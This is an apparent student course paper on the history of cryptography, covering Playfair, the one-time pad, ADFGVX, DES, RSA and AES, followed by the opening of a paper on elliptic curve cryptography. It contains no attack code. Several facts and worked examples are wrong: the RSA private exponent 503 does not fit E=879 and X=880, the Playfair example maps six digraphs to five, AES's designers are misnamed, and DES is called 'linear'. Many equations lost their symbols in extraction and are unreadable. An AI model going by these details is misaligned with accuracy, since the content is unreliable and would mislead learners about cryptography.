With that, via the Kaisiski test which was invented in 1861 by a German army officer
and cryptanalyst, Fredrich W. Kaisiski, identical parings of plaintext messages
together with its key symbols may generate same cipher symbols and such repetitive
generations can help to decode the plaintext message and at the same time, also break
the Vigenère cipher. If the cryptanalyst can identify the correct key length via either
the Kasiski or Friedman test, the cipher-text can be easily deciphered.
20
3.2 Jefferson’s Wheel Cipher
(http://www.freedom316.com/cryptografreaks/jefferson.php)
The Jefferson’s Wheel Cipher is a polyalphabetic cipher system consisting of a set of
wheels and an axle.
Before becoming the 3rd president of the United States, Thomas Jefferson, an
ambassador of US in France, invented the Jefferson Wheel Cipher in 1795 to ensure
messages sent to the US were secure and confidential. This cipher was not made
known to the US Army until in 1922 when Major Joseph Oswald Mauborgne of the
US Army signal corps enhanced on the idea and came up with the M-94
cryptographic equipment. Since then, the M94 became the main cipher used in
battlefields till 1942.
With regards to the Jefferson’s Wheel Cipher, 36 wheels are used and 26 letters of
the Latin alphabet are wrapped around each wheel in a random order. Each wheel is
numbered uniquely and the order around the axle will be a significant aspect of this
cipher system. A code word will be created by the user and it will be in accordance to
the ordering of the wheels. Different wheel orders will result in varying ciphers. As
the order gets formulated, the user can navigate the rows (ie. up and down) until the
entire message is fully formed. For instance, to encrypt the sentence, “You are
beautiful,” the letter “y” is placed on the outermost left wheel. The next wheel is
rotated until the letter “o” is next to “y”. The third wheel is rotated until “u” is next to
“o”. This is performed until all the letters in the messages are spelled out into 26
letters with no spaces and punctuation marks in between. The remaining rows of
letters stand for either the different cipher-texts derived or simply the plaintext
message. The user would have to copy the row of cipher-texts letters, with the
exception of the row containing the original text message, and send them to the
recipient. Upon receiving the discs, the recipients will have to arrange the discs in
accordance to the spelling of the cipher-text and identify the plaintext message
situated rows apart from the cipher-text. It would be highly unlikely that both the
cipher and plaintext message are readable and make sense in the English language as
such a scenario can be impeded by the coder/sender. Usually, only the plaintext
message is identifiable and readable so that the recipient can spot the plaintext
message easily. For messages containing more than 26 letters, users will have to
repeat the entire process until the entire message is formed in order to obtain the
entire cipher-text letters.
If the message to be encrypted is short and the order of letters and the wheels are
unknown, the Jefferson’s Wheel Cipher would be reasonably secure against modern
code-cracking techniques. The same applies to the encryption of more than one row
of text with disks of the same order. If the length of the message increases
substantially, one would need to use the letter frequencies of the English language to
source for patterns and decipher the message.
One of the limitations of this cipher system is that, the user would have to send
copies of the cipher system beforehand to his/her recipients. During ancient
civilization, this physical course of action would be extremely time-consuming as it
would take months to fulfill. By then, the message to be transmitted would become
useless and inaccurate.
21
4
War Cryptography
In this segment, we will be exploring three cryptography techniques and its features,
specifically the Playfair cipher, One Time Pad and ADFGVX cipher.
4.1 Playfair Cipher
(http://www.freedom316.com/cryptografreaks/playfair.php)
The Playfair cipher is the earliest digraph substitution cipher. It encrypts pair of letters
instead of each letter per encryption as illustrated in the Caesar cipher. It uses a table
whereby 25 letters within the English alphabet are arranged in a 5x5 tabular form.
Typically, “J” is removed from the table and its adjacent letter, “I”, will substitute it
when needed to encode a plaintext message.
The Playfair cipher was known to be more secure than the above mentioned
ciphers because it cannot be deciphered using the frequency analysis method, which is
normally used for single substitution cipher. To identify a Playfair cipher, one would
need to note that there are no double letter digraphs within the cipher text, and the
length of the message is reasonably long enough.
In 1854, this manual symmetric cipher was first introduced by a scientist, Charles
Wheatstone. During then, he was put in charge of building up on the electric telegraph
system in England. In addition, he was also sourcing for a method to communicate
securely with his friends. Thus, he came up with the Playfair cipher which can be
encoded and solved manually, and also, no other bulky or pricy equipments are
needed. However, the name “Playfair” was derived upon from Lord Lyon Playfair, a
renowned friend of Charles Wheatsone, who strongly supported and promoted the
cipher to be used within the British Army. As a result, it was used by the British
Army in World War I and the Australians in World War II to conceal significant,
albeit non-crucial communications and secrets against their enemies during the
warfare. If the enemies were to get hold of the concealed messages, they would not be
able to decode the messages promptly due to the increased difficulty in breaking the
cipher. Even if they could decode the message in the end, the message will not be
useful, timely and accurate anymore.
During the encoding of plaintext messages, the sender would need to break the text
messages into groups consisting of two letters and place them within a table. Two
letters within a digraph are supposed to be located at opposite ends within the key
table.
The following rules need to be adhered to during encoding.
Firstly, when there exist both letters within a digraph, the second repeated letter
will be substituted by “X”. Secondly, if letters within the same digraph are located
within the same row, substitute them with their respective letters located on their right
directly. Thirdly, if letters within the same digraph are located within the same
column, substitute them with their respective letters directly below them. Lastly, if the
letters are not located within the same row or column, replace them with the
respective letters located on the same row albeit, at the other end of the rectangle grid.
22
The sender would have to ensure the order because the first letter of the encrypted
pair should be positioned in the same row as the first letter of the plaintext pair.
Moreover, the plaintext message would require having even number of letters. If it
contains an odd number of letters, the last letter would need to be paired up with “X”.
For instance in the plaintext message, “HELLO EVERYBODY”, whereby there is
repeated letters in the group “LL” and it contains odd number of letters, the plaintext
message will be grouped as, “HE LX LO EV ER YB OD YX”. Subsequently, the
sender would need to observe the letter pairs and their positions within the grid.
If “playfair example” is used as the key, Figure 2 (Refer to Appendix A) would be
the table grid.
If the plaintext message is, “Hide the golds”, upon breaking up into groups of 2
letters, it will look like the digraph letters in Table 4 (Refer to Appendix A).
The pair “HI” is not located either in the same row or column, thus the sender can
replace it with letters on each opposite side. As a result, “HI” will become in “BM”.
The second pair “DE” is located within the same column. The sender can replace
the digraph pair with the respective letters directly below each letter. As a result,
“DE” will become “OD”.
The third pair “TH” is not located either in the same row or column. The sender
can replace it with letters on each opposite side. As a result, “TH” will become “ZB”.
Similarly upon applying the same rule, the fourth pair will be replaced by “XD” and
the fifth pair will be replaced by “HO”.
In summary, “HI DE TH EG OL DS” will become, “BM OD ZB XD HO”.
In order to decipher, if letters within the same cipher-text digraph are located
within the same row, substitute the letter with the one directly on the left. If letters
within the same cipher-text digraph are located within the same column, substitute
with the one directly on top.
The Playfair cipher can still be broken if there are sufficient amount of text. If
solely the cipher-text is known without the key and the plaintext message, brute force
method can be used on the cipher to determine frequency occurrence of the digraphs.
Frequency analysis can still be used to break the cipher only if there are
approximately 600 digraphs instead of solely 26 monographs. The frequency analysis
technique will only be applicable for implementation if there are more cipher-texts to
work on.
Another way to decipher the Playfair cipher is to observe its digraph carefully to
determine if there exists any reverse letters within a cipher-text. For instance, the
letter pair “AB” “BA” will be decrypted and result with same letter pairs in their
plaintext, “RE” and ER”. Words like “Receiver” or “Departed” both start and end
with same letter pairs. In such a scenario, one would need to identify and match the
reverse letter pairs to come up with a list of words starting and ending with the letters
“RE” and “ER” respectively before determining the correct plaintext in order to
source for the key.
To make the encryption more secure, The German Army, Air Force and Police
utilized the Double Playfair encryption technique during World War II. However, the
decryption technique used to decode the Double Playfair encryption was not a definite
secret and fool proof method too.
23
4.2 One Time Pad
(http://www.freedom316.com/cryptografreaks/onetimepad.php)
The One Time Pad is a cryptography system, also often referred to as either the
Vernam cipher or the perfect cipher. It is the sole cryptography technique whereby it
is mathematically unbreakable if it is used correctly. It is often used for diplomatic
and military warfare purposes among intelligence agencies to ensure the
confidentiality of messages transmitted. It has been utilized ever since the Cold War
period and mainly during World War II. The One Time Pad is known to be the only
cryptography system which provides bona-fide message security in the long run.
In order for the One Time Pad to be unbreakable and secure, the following rules
stated in the Table 5, (Refer to Appendix A), need to be abided by the message
sender..
In 1882, Californian banker Frank Miller invented the One Time Pad and
published it in his self-written codebook entitled, “Telegraphic Code to Insure Privacy
and Secrecy in the Transmission of Telegrams”.
In 1917, Gilbert Vernam, a research engineer at AT&T came up with an automated
electro-mechanical system to encrypt messages transmitted via teletypewriter
communications. The One-time Tape invented was a polyalphabetic cipher, using
non-repeating random sequence of characters. In 1920, AT&T promoted the Vernam
system, while also highlighting its secure communication function but the response
garnered was unsatisfactory. Instead, the one-time tapes were used by headquarters or
communication centres. The machine was marketed to the government for usage
during World War I but it was not put on sale till 1920 in the commercial market. It
was extensively put to use only during World War II.
When a random key is applied on a plaintext, the cipher-text derived is also known
to be random. With the cipher-text, the third party or unintended message recipient
cannot solve the mathematical algorithm because he has no clue of both the key and
the plaintext. In addition, since each digit or letter within the key is random, the
unintended recipient is unable to observe a mathematical link between each ciphertext characters. The modulo 10 (one time pad digits) or modulo 26 (one time pad
letters) is used to ensure that the cipher-texts do not disclose either the key or the
plaintext message.
Even with infinite computational power to source through all possible keys, an
adversary would still be unable to obtain the correct key. Thus, the one-time pad is
verified to be completely secure.
The absolute, random key is crucial in enabling the one time pad to be
mathematically unbreakable. Besides being random, the key cannot be used more than
once, if not the key can be made known via simple cryptanalysis. This is mainly
because by using the same key for more than once, the link between the two ciphertexts produced and keys will be made known. The cipher-text messages produced are
not randomized and the plain-text messages can be discovered via heuristic analysis.
Known-plaintext attacks can occur and the key will be made known. With that, there
is a risk for the adversary to find out about the contents of all the encrypted messages
belonging to the same key.
Conversely, the one-time pad lack message authentication. If the XOR method
applied to the key and plaintext is known to the adversary, he can tarnish the integrity
24
of the message by modifying the message with another message of the same length
without accessing the one-time pad directly. There have been methods to prevent such
a malicious occurrence within the one-time pad system via the use of message
authentication code and universal hashing of messages to uphold message integrity.
4.3
ADFGVX cipher
(http://www.freedom316.com/cryptografreaks/adfgvx.php)
The ADFGVX cipher is a fractionating transposition cipher. It was derived upon from
the ADFGX cipher, an earlier yet similar cipher invented by Colonel Fritz Nebel in
1918. The letter “V” was added to the name so that the entire alphabet can be
positioned in the 6x6 Polybius square. Hence, substituting the use of “J” with “I” will
not be performed anymore. The individual letters “ADFGX” are extremely different
when converted into Morse code. Thus, the name of the cipher, “ADFGVX” was
chosen to minimize any error during encoding and transmission activities.
The ADFGVX cipher was introduced and utilized by the German Army in World
War I to conceal communications made against unintended recipients.
This cipher uses a key – a 6x6 Polybius square grid which contains 26 letters in the
entire English alphabet and digits from 0 to 9 as shown in Figure 3 (Refer to
Appendix A).
All the columns and rows in the grid are occupied by either a letter or digit and
they are arranged randomly via permutation. Firstly during encryption, each character
of the plaintext is substituted with corresponding labels of the respective row and
column in the key. Following that, the text undergoes fractionating and columnar
transposition. A few columns are chosen and the cipher-text is printed row by row,
having each character within a column. The columns would then be re-ordered via
permutation such that the assignment of the length of the keyword is equivalent to the
number of columns before arranging them in alphabetical order in accordance to the
labelling of the keyword. Lastly, the cipher-text can be derived from printing out the
columns in the correct order.
For example, the plaintext message, “Attack at 1800” will result in the following
cipher-text, “DF DG DG DF AD GG DF DG DX XF PG PG”. By re-ordering the
columns via permutation, the following cipher-text will result in Figure 4 (Refer to
Appendix A).
Lastly, via fractionating and columnar transposition, the resultant cipher-text is
illustrated in Figure 5 (Refer to Appendix A).
Shortly within the same year, the cipher was broken with the use of complex
algorithms by Georges Painvin, a French Army Lieutenant. In today’s context, the
ADFGVX cipher is deemed to be relatively insecure because it can be cryptanalysed,
especially if the length of the keyword is known, and the unintended recipient is able
to rearrange rows into their correct order. Together with the brute force and trial-anderror techniques, the recipient might be able to decode the cipher. However, to
enhance the security of the cipher, the sender can apply other ciphers on the plaintext
message so that the level of difficulty in decoding the cipher will increase
significantly.
25
5.0 Modern Cryptography
In this segment, we will be exploring cryptography techniques and their respective
features used in the modern context, specifically the DES, RSA and the AES.
5.1 Data Encryption Standard (DES)
(http://www.freedom316.com/cryptografreaks/des.php)
The DES is a block cipher, using shared secret encryption among intended parties. It
was invented by the National Bureau of Standards, with the help of the National
Security Agency in the 1970s. The implementation of DES was aimed at offering a
standard scheme in protecting and concealing sensitive, commercial information and
unclassified government applications against unintended parties. The initial draft was
created by IBM and it was named as the “Lucifer”. In 1976, after much redesigning
and modification, the DES officially became a federal standard. From then on, the
DES has been extensively adopted and published as a standard worldwide.
There has been a public debate over the design and selection of the 56-bit key.
However, recent analysis has illustrated that the selection was appropriate and the
DES was indeed well-designed. [14 in Appendix B]
In Figure 6 (Refer to Appendix A), the key determines the mechanism of the
process. By applying these operations repetitively in a continuous mode, the DES will
obtain a result of approximate randomness and without the key. Any unintended
recipients will not be able to obtain the original plaintext message.
The fundamental procedure of encoding a 64-bit plaintext data block each time
within a DES goes through the iteration 16 times. Initially, it goes through an initial
permutation. Initially, there is a 64-bit key but 8 bits will be used for parity checking
purposes. Thus, every 8th bit of the key will be discarded upon checking. Inside each
iteration, 48-bits from the 56-bit key enter the complex key dependent function. The
function is the crux of security within the entire DES and it contains numerous
varying transformation and non-linear substitution to ensure that the cipher would be
linear and unbreakable. After going through both the XOR and key dependent
function, a final permutation, which is the inverse of the initial permutation function,
will be performed on the output. The ultimate output of the DES is a cipher-text
which has the same bit-string length as the original plaintext message input.
At the start of each iteration, the 64-bit plaintext message block is halved, with the
right 32-bits block undergoing the Feistal structure before being XOR-ed with its left
32-bits block. In the last iteration, it exchanges position with the left 32-bits block.
There are two essential cryptography techniques within the DES, namely confusion
and diffusion. At the most initial stage, diffusion is performed through several
permutations while confusion is performed via the XOR function.
Within the Feistal structure, 32 bits undergo through it each time and it consists of
four phases. Firstly, during expansion, the 32 bit block is lengthened to 48 bits via the
expansion permutation function by duplicating half of the initial 32 bits. The output of
the function contains eight 6-bit blocks, each block consisting of a copy of 4
corresponding input bits and the adjacent bit from its respective input bits on both
sides. Secondly, during the key mixing phase, the output of the expansion phase is
26
added to the sub-key via an XOR operation. Sixteen 48-bit sub-keys are derived from
each round of the key mixing phase and is obtained from the main key. Thirdly, after
the key mixing phase, the block is divided into eight 6-bit pieces and undergoes
through processing in the substitution boxes. Each of the eight S-boxes swaps six
input bits with four output bits via non-linear transformation with the help of the
lookup table. Lastly, in the permutation phase, the output from each of the eight Sboxes is concatenated to produce a 32-bit output and this output is permutated within
the P-box. Since the P-box conducts straight permutation operations, the resultant
output will undergo the XOR operation with the left 32-bit block input at the start of
each round. With the exception of the final round, the left and right 32-bit halves are
interchanged and it goes through the Feistal structure again.
Since DES utilizes a key to operate its encryption mechanism, only those who are
aware of the particular key used can decrypt the cipher-text. However, the DES is not
secure at all. Since the 56-bit key in the DES is extremely short, it is susceptible to
brute-force decryption techniques via searches for the key space with the use of
machines and specialized hardware. In 1998, the Electronic Frontier Foundation
developed a DES-cracking machine and thus, was able to locate a DES key within a
couple of days. Any corporation, government agency or malicious organization could
easily purchase such a machine to decipher a DES cipher-text.
However, another encryption technique, Triple DES, has enhanced security
characteristics because DES is applied thrice using three different keys. It is much
secure because a brute force key search attempt will be made impossible. The minor
disadvantage of Triple DES is that it functions at approximately 0.66% of the speed of
DES but modern CPUs are able to run it at a decently.
5.2 Ron Shamir Adlemen (RSA)
(http://www.freedom316.com/cryptografreaks/rsa.php)
The RSA encryption system uses a public key cryptography technique to provide and
maintain privacy, confidentiality and authenticity of digital data. Examples of such
uses include those in electronic commerce protocols, web servers and browsers which
elicit web traffic, electronic communications such as e-mails, remote logging-in
sessions and credit card payment verification systems. [16 in Appendix B]
RSA was invented by Ron Rivest, Adi Shamir, and Len Adlemen and their first
publication about RSA was made in August 1977 in the Scientific American journal.
The name, RSA, represents the initials of the three inventors’ surnames and they are
positioned in accordance to the order which was listed in the paper published.
Following that in 1978, the RSA algorithm was made available in print in the
Communications of the ACM.
With regards to the RSA algorithm, generating prime numbers are indeed very
crucial. This is mainly because the security of RSA public key encryption technique
depends largely on the computational difficulty of finding the complete factorization
of a large composite integer whose prime factors are unknown.
The RSA algorithm consists of four steps, namely creation of public key,
encryption of messages, creation of private key, and decryption of messages. The
27
public key will be made known to everyone and will be used to encrypt messages
while the private key is only used for decrypting messages.
During the creation of a public key, the sender would have to choose two large
prime numbers P and Q. For example the sender chooses the following values, P = 23
and Q = 41.
Upon substituting the value of P and Q into equation 1 (Refer to Appendix A), X =
880.
Since E is relative prime to X, E can be equivalent to 879.
Similarly in equation 2 (Refer to Appendix A), N = 943.
With the value of the public key to be known as the value of N being concatenated
with the value of E, the sender is able to encrypt the message.
As shown, the message equals to the value of m which is 35.
In order to encode and send the message to the recipient, the sender would have to
calculate the value of C in equation 3 (Refer to Appendix A).
Upon substituting the values of m, E and N, C = 545. The value of C is the
encoded message which the sender will send to the message recipient.
In order to decipher the encoded message, the recipient will have to work out the
multiplicative inverse of equation 4 (Refer to Appendix A) in order to find the value
of D.
Upon substituting the relevant values, D = 503.
The value of the private key used will be the value of N being concatenated with
the value of D.
In order to decode the message, the recipient must calculate the value of m in
equation 5 (Refer to Appendix A).
By substituting equation (3) into equation (5), equation (6) (Refer to Appendix A)
will result as the following.
Based on equation 6, in order to calculate the value of the message transmitted, the
intended recipient would have to know the value of D and E. In the above example,
both the values of P and Q are relatively small and perhaps, by brute force
mathematical methods, the message can still be made known if the unintended
recipient is able to solve equation (1) upon finding the value of x and E. If the values
of P and Q become very much larger, any unintended recipient will not be able to
compute the value of D and E via brute force methods because it would be very much
tedious and computationally infeasible to find the complete factorization of large
composite integers whose prime factors are unknown. As a result, the RSA algorithm
is reasonably secure if both the values of and P and Q are large and hence, messages
being encrypted can continue to maintain its confidentiality and integrity.
Due to the fact that the RSA algorithm is a deterministic encryption technique, a
malicious, unintended recipient of a message can conduct a chosen plaintext attack by
encrypting similar plaintext messages using the known public key to check if the
encrypted messages are equal to the cipher-texts upon comparison. RSA cryptography
system without padding is not semantically secure as such recipients are able to
distinguish two encrypted messages apart from each other. Thus, in order to prevent
the occurrences of such attacks, RSA implementation in reality generally input a
structured, randomized padding into the message before encryption. This ensures that
the padded message will be encrypted to form different possible cipher-texts even if
the padded messages were identical.
28
The largest number which was factored by a factoring algorithm in recent years
was 768 bits long. Since the length of RSA keys are generally 1024 to 2048 bits long,
it is still unbreakable in today’s context.
With regards to the authentication of the message, the sender can make use of RSA
to digitally sign a message.
If the sender wants to sign on a digital message before sending it to the intended
recipient, he/she can use his/her private key to create a digital signature. The sender
would have to create a hash message and append her digital signature to it. Upon
receiving the digitally signed message, the intended recipient will have to use an
identical hash algorithm to encrypt the message. The recipient will have to encrypt the
signature and the message and compare the hash value with the message’s actual hash
value. If both hashes are the same, the recipient will be absolutely certain that it was
the sender’s private key who digitally signed the message and the message has
retained its integrity.
Digital signature schemes like the RSA-PSS (Probabilistic Signature Scheme) will
be required for the use of creating digital signatures during message encryption so as
to enhance security assurance. In addition, the sender would also need to note that the
same key should not be used for both encryption and creation of digital signatures.
5.3
Advanced Encryption Standard (AES)
(http://www.freedom316.com/cryptografreaks/aes.php)
The AES is an iterative, symmetric block cipher which is used to encrypt and decrypt
electronic data using the same key. Upon encryption, its output has the same number
of bits as compared to the original plaintext message. The AES utilizes keys of 128,
192 and 256 bits to encrypt and decrypt data in blocks of 128 bits. [13] It also uses a
loop structure to conduct permutation and substitution on the input plaintext
repeatedly. Within AES, there is no Feistel structure. Instead, it utilizes the
substitution permutation network.
In 2001, the AES algorithm was introduced by the National Institute for Standards
and Technology to ensure the confidentiality of top secret information. The AES was
initially named the Rijndael and was originally invented by two Belgian
cryptographers, Joan Daemon and Vincent Rijndael.
Due to the extremely short key in the DES, many malicious attacks via
sophisticated hardware and software have effectively decrypted data which were
encrypted by the DES system. Since DES lacks the fundamental security features, the
AES was introduced to overtake the existence of the DES as a Federal Standard in
2002 by the Secretary of Commerce.
Common usages pertaining to the AES include file encryption on hard disk or
thumb drive and encryption of electronic mail messages.
As seen in Figure 7(Refer to Appendix A), within the AES algorithm, during key
expansion, round keys are obtained from the cipher key based on the Rijndael’s key
schedule. In the first round, each byte of state undergoes bitwise XOR with the round
key.
In the subsequent nine rounds, during the SubByte step, each byte within the
matrix is updated in accordance to the 8-bit Rijndael Substitution box look-up table.
This step offers non-linearity in the cipher via multiplicative inverse over a finite
29
field. In the ShiftRow step, the first row remains as it is. Each byte starting from the
second row is shifted one position to the left, while the third row is shifted two
positions to the left and so on. In the MixColumn step, four bytes belonging to each
column of state are combined via an invertible linear transformation. The function
operates on the four byte input and the resultant is also, a four byte output. Each
column is also multiplied against a matrix made up of the 128-bit key. In the
XORnthRoundKey step, upon getting the sub-key from the main key via the
Rijndael’s key schedule, each byte of the sub-key is combined with each byte of the
state during the bitwise XOR operation.
In the final round, all steps are repeated except the MixColumn step before
obtaining an encrypted output.
In order to obtain the plaintext input from the encrypted output, a reverse of the
above rounds are required to be carried out with the use of the same encryption key.
In 2009, there were publications pertaining to attacks against the AES
cryptography system. However, the National Security Agency stated that the AES
was still capable of securing non-classified data belonging to the US government.
This is mainly because the published attacks in theory are a related key attack
whereby the adversary would need to gain access to plaintexts that are encrypted with
multiple, related keys. In addition, with regards to the AES-256, it has 14 rounds. The
published attack had broken only 11 rounds. At this current moment, the theoretical
attack is still beyond computational feasibility.
30
6
Conclusion
Throughout the years since ancient times, people have been inventing cryptographic
systems to conceal messages used for communication purposes from their unintended
recipients. Having studied the various cryptographic systems above, we have learnt
that most cryptographic systems have its limitations. Even with such limitations,
cryptography activities have been widely adopted by people, for military usages in the
ancient era to commercial purposes in today’s context. As newer and more
complicated cryptography techniques are being developed, the probability of cracking
a cipher have also become more difficult and thus, people are able to further ensure
message confidentiality while also, being more competent in deterring malicious
attacks by third party adversaries.
7
References (Refer to Appendix B for more references)
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
Logical Security,
http://www.logicalsecurity.com/resources/whitepapers/Cryptography.pdf
Redline, http://www.freewebs.com/atbash_cipher/atbshhistory.htm
Redline, http://redline.webamphibian.com/crypt/jefferson.asp
Cipher Machines http://ciphermachines.com/ciphermachines/jefferson.html
Britannica Encyclopedia,
http://www.britannica.com/EBchecked/topic/628637/Vigenère-cipher
Jeremy Norman’s From Cave Painting to the Internet
http://www.historyofinformation.com/index.php?id=2011
Vanderblit University, http://blogs.vanderbilt.edu/mlascrypto/blog/wpcontent/uploads/project-playfair-cipher.pdf
Shifted Bits Blog, http://www.shiftedbits.net/code/the-adfgvx-cipher/
Cipher Machines & Cryptography,
http://users.telenet.be/d.rijmenants/en/onetimepad.htm
Next Wave Software, http://www.thenextwave.com/page19.html
Linux Free S/Wan, http://www.freeswan.org/freeswan_trees/freeswan1.5/doc/DES.html
EKU, http://people.eku.edu/styere/Encrypt/RSAdemo.html
Federal Information Processing Standards Publication 197,
http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf
MSDN Magazine, http://msdn.microsoft.com/enus/magazine/cc164055.aspx
Business Security,
http://bizsecurity.about.com/od/informationsecurity/a/aes_history.htm
Schneier on Security,
http://www.schneier.com/blog/archives/2009/07/another_new_aes.html
31
32
H!Appendix A
Tables
Table 1. Atbash Cipher of the Roman alphabet
Plaintext
Cipher-text
A
Z
B
Y
C
X
D
W
E
V
F
U
G
T
H
S
I
R
J
Q
Table 2. Caesar cipher of the Roman alphabet, shift of 3
Plaintext
Cipher-text
A
D
B
E
C
F
D
G
E
H
F
I
G
J
H
K
I
L
J
M
Table 3. Vigenere cipher example
Plaintext
Key
Cipher
H
H
O
E
E
I
L
Y
J
L
H
S
O
E
S
Table 4. Playfair cipher digraph example
HI
DE
TH
EG
OL
DS
Table 5. Rules of a One Time Pad (http://users.telenet.be/d.rijmenants/en/onetimepad.htm)
1.
The length of the key is equivalent to the message to be encrypted.
2.
The key is random.
3.
Both the key and plaintext are calculated modulo 10 (digits), modulo 26
(letters) or modulo 2 (binary)
4.
Each key can only be used once. After each use, both the sender and recipient
must destroy their key.
5.
There should only be a key each for the sender and recipient
33
Figures
Fig 1. Vigenere Table
Fig 2. Playfair cipher key table
34
Fig 3. ADFGVX cipher key
Fig 4. ADFGVX cipher-text
Fig 5. ADFGVX resultant cipher-text
35
Fig 6. DES block diagram
Fig 7. Summary of AES Encryption
36
Formulas
X = (P-1) (Q-1).
(1)
N = P*Q.
(2)
c = mEmod N
(3)
D*E mod x = 1
(4)
m = cD mod N
(5)
cD mod N = mED mod N
(6)
37
Appendix B
References
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
15.
16.
17.
18.
19.
Student Pulse, http://www.studentpulse.com/articles/41/a-brief-history-ofcryptography
Gary Kessler Associates, http://www.garykessler.net/library/crypto.html
Cornell Mathematics,
http://www.math.cornell.edu/~kozdron/Teaching/Cornell/135Summer06/Handouts/L
ecture2.pdf
Oracle Thinkquest: Library
http://library.thinkquest.org/28005/flashed/timemachine/courseofhistory/jefferson.sht
ml
Crypto Museum, http://www.cryptomuseum.com/crypto/usa/jefferson/index.htm#ref
Discovering Lewis & Clerk, http://lewis-clark.org/content/contentarticle.asp?ArticleID=2224
Rumkin,com, http://rumkin.com/tools/cipher/playfair.php
Practical Cryptography, http://practicalcryptography.com/ciphers/playfair-cipher/
Practical Cryptography, http://practicalcryptography.com/ciphers/adfgvx-cipher/
RuffNekk’s Crypto Pages, http://ruffnekk.stormloader.com/adfgvx_info.html
University of Cambridge, http://www.srcf.ucam.org/~bgr25/cipher/adfgvx.php
Marcus J. Ranum, http://www.ranum.com/security/computer_security/papers/otp-faq/
Universiteit van Amsterdam, http://www.maurits.vdschee.nl/otp/
Books by William Stallings, http://williamstallings.com/Extras/SecurityNotes/lectures/blockA.html
University of Wisconsin Madison, http://pages.cs.wisc.edu/~rist/papers/detenc-rel.pdf
Applied Crypto Group, http://crypto.stanford.edu/~dabo/pubs/papers/RSA-survey.pdf
RSA Encryption – Tom Davis, http://www.geometer.org/mathcircles/RSA.pdf
RSA Public-Key Cryptography, http://www.efgh.com/software/rsa.htm
Schneier on Security,
http://www.schneier.com/blog/archives/2009/07/new_attack_on_a.html
38
Elliptic Curve Cryptography
Guan Xiao Kang, Chong Wei Zhi, Cheong Pui Kun Joan
National University of Singapore (NUS), School of Computing,
CS3235: Computer Security
Abstract. This paper gives an overview of the Elliptic Curve Cryptography
(ECC) and how it is used to implement digital signature using Elliptic Curve
Digital Signature Algorithm (ECDSA) and key agreement protocols using
Elliptic Curve Diffie-Hellman (ECDH). There is discussion on the
mathematical components of an elliptic curve function and underlying theories
of ECC. It also gives a general description of the security issues of ECC as well
as some ECC implementation examples.
1 Introduction
Elliptic Curve Cryptography (ECC) is a public key cryptography method based on
elliptic curves over a finite field. There are two main uses of public key cryptography:
public key encryption and digital signatures. Public key encryption involves sending a
message encrypted with the recipient‟s public key, which can only be decrypted with
the recipient‟s private key to prove confidentiality. Digital signature on the other hand,
is used to prove authenticity of the sender; a message encrypted with the sender‟s
private key will be sent to the recipient, who will decrypt the message with the
sender‟s matching public key to prove that the sender had access to the associated
private key.
Such public key cryptography is assumed to be secured due to the difficulty in
factorization of a large integer made up of two large prime factors, the larger the key
length, the more secure it is. ECC is able to provide a similar level and type of
security with much smaller key lengths due to the difficulty of solving the ECC
discrete logarithm problems; finding the solution of k where k =
and P and Q
are points on the elliptic curve E defined over a finite field. Hence, with short key
length, handshaking protocols used between sender and recipient where public key
cryptography is implemented will be faster.
39
2 Mathematical Knowledge for ECC
2.1 Elliptic Curve Function
Elliptic curves are formed by quadratic curves to become cubic. An elliptic curve E,
over a field F, can be described by the equation
=
+ a + b, where a, b F.
Elliptic curve cryptography is defined over the elliptic curve
=
+ a + b, where
the discriminant of the equation, 4 + 27
must not be equal to 0. This condition
must be satisfied such that the elliptic curve possesses 3 distinct roots. If the
discriminant=0, there will be 2 or more roots coalescing, producing curves that are
singular. Singular curves are not desirable for cryptography because it is easy to crack.
Another characteristic of the elliptic curve is that the curve is symmetric about x axis,
which can be observed by rewriting the equation =
.
Every individual values „a‟ and „b‟ of the equation gives a different elliptic curve and
all points (x,y) of the equation lies on the curve with an infinite point. For instance,
implementation of ECC on public key cryptography results in a public key that is a
point on the curve and a private key that is a number randomly generated. The public
key can be obtained by multiplying the private key with a generator point G on the
curve. This generator G, values „a‟ and „b‟ within the field F, and other constants
form the domain parameters of ECC, which will be further elaborated under „Elliptic
Curve Domain Parameters for different finite fields‟ of this paper.
2.2 Point Addition
Before going into point multiplication which is necessary for generating the keys,
point addition is required as it is part of point multiplication. Point addition is
basically the adding of 2 points J and K on an elliptic curve so to obtain another point
L on the same elliptic curve.
40
Fig. 1. The graph above demonstrates a line intersecting J, K and –L if J ≠ K for point addition.
The elliptic curve has 2 properties, and the first is if a line intersects 2 points, it will
intersect a 3rd point. Fig. 1 above shows that if J ≠ K and a line is drawn through both
of the points J and K, it will intersect the point –L on the same elliptic curve. After
that, reflect –L with respect to the x-axis in order to get L. This gives the equation of
L = J + K on an elliptic curve.
Fig. 2. The graph above demonstrates a line intersecting J, K and ∞ if J = -K for point addition
and if the line is a vertical line.
If J = -K, the line that intersects both J and K would also intersect the point ∞ since all
vertical lines intersect the curve at point ∞. The curve has an increasing slope after an
inflection point and it will eventually become infinite and intersect ∞ as well.
Therefore, J + (-J) = ∞ and ∞ is the identity for point addition.
Hence J + (-J) = O. This is shown in figure (b). O is the additive identity of the elliptic
curve group.
To find the point of L, we have to first find the line intersecting J, K and –L. Let J =
(xJ, yJ), K = (xK, yK) and L = (xL, yL).
Let the slope of the line be s and the equation to find the slope will be s = (yJ – yK) /
(xJ – xK).
To find xL and yL, the following equation can be used:
1.
2.
xL = s2 – xJ – xK
yL = -yJ + s(xJ – xL)
41
However, if J = -K i.e. K = (xJ, -yJ) then J + K = O. where O is the point at infinity.
The second property is if a line is tangent to the elliptic curve, it will intersect another
point on the same elliptic curve. This will be further elaborated at the next section.
2.3 Point Doubling on real numbers, Prime field, Binary field and also
in Projective Coordinate System
Fig. 3. The graph above demonstrates a line tangent at the point J and intersecting -L if J = K
for point doubling
The second property is if a line is tangent to the elliptic curve, it will intersect another
point on the same elliptic curve. Fig. 3 above shows that if J = K and a line is drawn
tangent to the point J, it will intersect the point –L on the same elliptic curve.
Similarly, reflect –L with respect to the x-axis in order to get L. This will give the
equation of L = 2J on an elliptic curve.
42
Fig. 4. The graph above demonstrates a line tangent at the point J and intersecting -∞ if yJ = 0
for point doubling and if the line is a vertical line
However, if the y-coordinate of point J is at zero, then the tangent to this point will
intersect ∞. This results in 2J = ∞ when if the y-coordinate of point J is at zero.
To find the point of L, we have to first find the line tangent to J and intersecting –L.
